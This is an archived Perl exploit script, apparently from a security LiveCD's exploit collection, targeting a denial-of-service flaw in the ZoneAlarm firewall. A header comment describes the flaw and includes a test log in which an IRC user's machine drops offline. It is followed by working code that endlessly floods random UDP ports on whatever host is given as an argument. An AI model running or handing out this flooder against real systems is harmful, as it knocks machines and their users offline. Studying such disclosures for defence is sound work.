home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / firewall / ZoneAlarm / zonealarm-udp-dos.pl < prev   
Text File  |  2005-02-12  |  3KB  |  149 lines

  1. # Overview :
  2. #
  3. # ZoneAlarm is a firewall software
  4. # package designed for Microsoft Windows
  5. # operating systems that blocks intrusion
  6. # attempts, trusted by millions, and has
  7. # advanced privacy features like worms,
  8. # Trojan horses, and spyware protection.
  9. # ZoneAlarm is distributed and maintained
  10. # by Zone Labs.http://www.zonelabs.com
  11. #
  12. # Details :
  13. #
  14. # ZoneAlarm was found vulnerable to a
  15. # serious vulnerability leading to a
  16. # remote Denial Of Service condition due
  17. # to failure to handle udp random
  18. # packets, if an attacker sends multiple
  19. # udp packets to multiple ports 0-65000,
  20. # the machine will hang up until the
  21. # attacker stop flooding.
  22. #
  23. # The following is a remote test done
  24. # under ZoneAlarm version 3.7.202 running
  25. # on windows xp home edition.
  26. #
  27. # on irc test1 joined running ZoneAlarm
  28. # version 3.7.202 with default
  29. # installation
  30. #
  31. # * test1 (test@62.251.***.**) has joined #Hackology
  32. #
  33. # from a linux box :
  34. #
  35. # [root@mail DoS]# ping 62.251.***.**
  36. # PING 62.251.***.** (62.251.***.**) from
  37. # ***.***.**.** : 56(84) bytes of data.
  38. #
  39. # --- 62.251.***.** ping statistics ---
  40. # 7 packets transmitted, 0 received, 100%
  41. # loss, time 6017ms
  42. #
  43. # on irc
  44. #
  45. # -> [test1] PING
  46. #
  47. # [test1 PING reply]: 1secs
  48. #
  49. # Host is firewalled and up
  50. #
  51. # now lets try to dos
  52. #
  53. # --- ZoneAlarm Remote DoS Xploit
  54. # ---
  55. # --- Discovered & Coded By _6mO_HaCk
  56. #
  57. # [*] DoSing 62.251.***.** ... wait 1
  58. # minute and then CTRL+C to stop
  59. #
  60. # [root@mail DoS]#
  61. #
  62. # after 2 minutes
  63. #
  64. # * test1 (test@62.251.***.**) Quit (Ping timeout)
  65. #
  66. # I have made the same test on ZoneAlarm
  67. # Pro 4.0 Release running on windows xp
  68. # professional and i've got the same
  69. # result.
  70. #
  71. # Exploit released : 02/09/03
  72. #
  73. # Vulnerable Versions : ALL
  74. #
  75. # Operating Systems : ALL Windows
  76. #
  77. # Successfully Tested on :
  78. #
  79. # ZoneAlarm version 3.7.202 / windows xp
  80. # home edition / windows 98.
  81. #
  82. # ZoneAlarm Pro 4.0 Release / windows xp
  83. # professional
  84. #
  85. # Vendor status : UNKOWN
  86. #
  87. # Solution : Shut down ZoneAlarm and wait
  88. # for an update.
  89. #
  90. # The following is a simple code written
  91. # in perl to demonstrate that, the code
  92. # is clean, it wont eat your cpu usage
  93. # and it doesnt need to be run as root
  94. # but you still have to use it at your
  95. # own risk and on your own machine or
  96. # remotly after you get permission.
  97. #
  98. # Big thanx go to D|NOOO and frost for
  99. # providing me windows boxes with
  100. # zonealarm for testing
  101. #
  102. # Greetz to ir7ioli, BlooDMASK
  103. # Abderrahman@zone-h.org
  104. # NRGY, Le_Ro| JT ghosted_ Securma,
  105. # anasoft SySiPh, phrack, DeV|L0Ty,
  106. # MajNouN |BiG-LuV| h4ckg1rl and all
  107. # my ppl here in Chicago and in Morocco
  108. #
  109. # Comments suggestions or additional info
  110. # feel free to contact me at
  111. # simo@benyoussef.org
  112. # _6mO_HaCk@linuxmail.org
  113.  
  114. #!/usr/bin/perl
  115. use Socket;
  116.  
  117. system(clear);
  118. print "\n";
  119. print "--- ZoneAlarm Remote DoS Xploit\n";
  120. print "---\n";
  121. print "--- Discovered & Coded By _6mO_HaCk\n";
  122. print "\n";
  123. if(!defined($ARGV[0]))
  124. {
  125.    &usage
  126. }
  127.  
  128. my ($target);
  129.  $target=$ARGV[0];
  130.  
  131. my $ia       = inet_aton($target)        || die ("[-] Unable to resolve
  132. $target");
  133.  
  134. socket(DoS, PF_INET, SOCK_DGRAM, 17);
  135.     $iaddr = inet_aton("$target");
  136.  
  137. print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
  138.  
  139. for (;;) {
  140.  $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
  141. $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
  142. $rand x $rand;
  143.  $port=int(rand 65000) +1;
  144.  send(DoS, 0, $size, sockaddr_in($port, $iaddr));
  145. }
  146. sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}
  147.  
  148.  
  149.